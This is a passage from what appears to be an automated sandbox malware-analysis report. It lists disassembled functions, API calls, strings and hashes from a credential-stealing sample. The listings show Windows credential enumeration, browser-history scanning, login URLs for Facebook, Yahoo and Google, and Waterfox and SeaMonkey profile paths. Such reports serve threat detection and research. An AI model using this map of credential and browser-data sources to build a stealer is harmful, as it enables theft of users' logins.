                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                          • API String ID: 2941347001-70141382
                                                                                                                                                                                                          • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                                                                                                          • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 697 4466f4-44670e call 446904 GetModuleHandleA 700 446710-44671b 697->700 701 44672f-446732 697->701 700->701 702 44671d-446726 700->702 703 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 701->703 705 446747-44674b 702->705 706 446728-44672d 702->706 711 4467ac-4467b7 __setusermatherr 703->711 712 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 703->712 705->701 707 44674d-44674f 705->707 706->701 709 446734-44673b 706->709 710 446755-446758 707->710 709->701 713 44673d-446745 709->713 710->703 711->712 716 446810-446819 712->716 717 44681e-446825 712->717 713->710 718 4468d8-4468dd call 44693d 716->718 719 446827-446832 717->719 720 44686c-446870 717->720 723 446834-446838 719->723 724 44683a-44683e 719->724 721 446845-44684b 720->721 722 446872-446877 720->722 726 446853-446864 GetStartupInfoW 721->726 727 44684d-446851 721->727 722->720 723->719 723->724 724->721 728 446840-446842 724->728 730 446866-44686a 726->730 731 446879-44687b 726->731 727->726 727->728 728->721 732 44687c-446894 GetModuleHandleA call 41276d 730->732 731->732 735 446896-446897 exit 732->735 736 44689d-4468d6 _cexit 732->736 735->736 736->718
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2827331108-0
                                                                                                                                                                                                          • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                                                                          • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                          • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                                                          • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                                                                                                                          • String ID: visited:
                                                                                                                                                                                                          • API String ID: 1157525455-1702587658
                                                                                                                                                                                                          • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                                          • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 763 40e175-40e1a1 call 40695d call 406b90 768 40e1a7-40e1e5 memset 763->768 769 40e299-40e2a8 call 4069a3 763->769 771 40e1e8-40e1fa call 406e8f 768->771 775 40e270-40e27d call 406b53 771->775 776 40e1fc-40e219 call 40dd50 * 2 771->776 775->771 781 40e283-40e286 775->781 776->775 787 40e21b-40e21d 776->787 784 40e291-40e294 call 40aa04 781->784 785 40e288-40e290 ??3@YAXPAX@Z 781->785 784->769 785->784 787->775 788 40e21f-40e235 call 40742e 787->788 788->775 791 40e237-40e242 call 40aae3 788->791 791->775 794 40e244-40e26b _snwprintf call 40a8d0 791->794 794->775
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                                                                                                                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                            • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                                                            • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                                                          • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                                                          • API String ID: 3883404497-2982631422
                                                                                                                                                                                                          • Opcode ID: f6320f83e9b091826697580f88646c77f053f42bbd7529e7c130ef97409cf436
                                                                                                                                                                                                          • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f6320f83e9b091826697580f88646c77f053f42bbd7529e7c130ef97409cf436
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                            • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040BC75
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                                                                          • memcmp.MSVCRT ref: 0040BCD6
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040BD2B
                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 509814883-3916222277
                                                                                                                                                                                                          • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                                          • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 848 41837f-4183bf 849 4183c1-4183cc call 418197 848->849 850 4183dc-4183ec call 418160 848->850 855 4183d2-4183d8 849->855 856 418517-41851d 849->856 857 4183f6-41840b 850->857 858 4183ee-4183f1 850->858 855->850 859 418417-418423 857->859 860 41840d-418415 857->860 858->856 861 418427-418442 call 41739b 859->861 860->861 864 418444-41845d CreateFileW 861->864 865 41845f-418475 CreateFileA 861->865 866 418477-41847c 864->866 865->866 867 4184c2-4184c7 866->867 868 41847e-418495 GetLastError ??3@YAXPAX@Z 866->868 871 4184d5-418501 memset call 418758 867->871 872 4184c9-4184d3 867->872 869 4184b5-4184c0 call 444706 868->869 870 418497-4184b3 call 41837f 868->870 869->856 870->856 878 418506-418515 ??3@YAXPAX@Z 871->878 872->871 878->856
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateFile$??3@ErrorLast
                                                                                                                                                                                                          • String ID: |A
                                                                                                                                                                                                          • API String ID: 1407640353-1717621600
                                                                                                                                                                                                          • Opcode ID: 5aeeff076a9cd849f72a1ec08649adad283ef9ce1d91fa95086884072959f8da
                                                                                                                                                                                                          • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5aeeff076a9cd849f72a1ec08649adad283ef9ce1d91fa95086884072959f8da
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                                                          • String ID: r!A
                                                                                                                                                                                                          • API String ID: 2791114272-628097481
                                                                                                                                                                                                          • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                                                          • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                            • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                            • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                            • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                            • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                            • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                            • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                          • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                            • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                                            • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                                          • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                                          • API String ID: 62308376-4196376884
                                                                                                                                                                                                          • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                                          • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                                          • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                          • _wcsncoll.MSVCRT ref: 0040BE38
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040BEB2
                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3191383707-0
                                                                                                                                                                                                          • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                                          • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403D13
                                                                                                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                                          • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                                                          • API String ID: 3527940856-11920434
                                                                                                                                                                                                          • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                                          • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403E50
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403E65
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                                          • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                                                          • API String ID: 3527940856-2068335096
                                                                                                                                                                                                          • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                                          • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
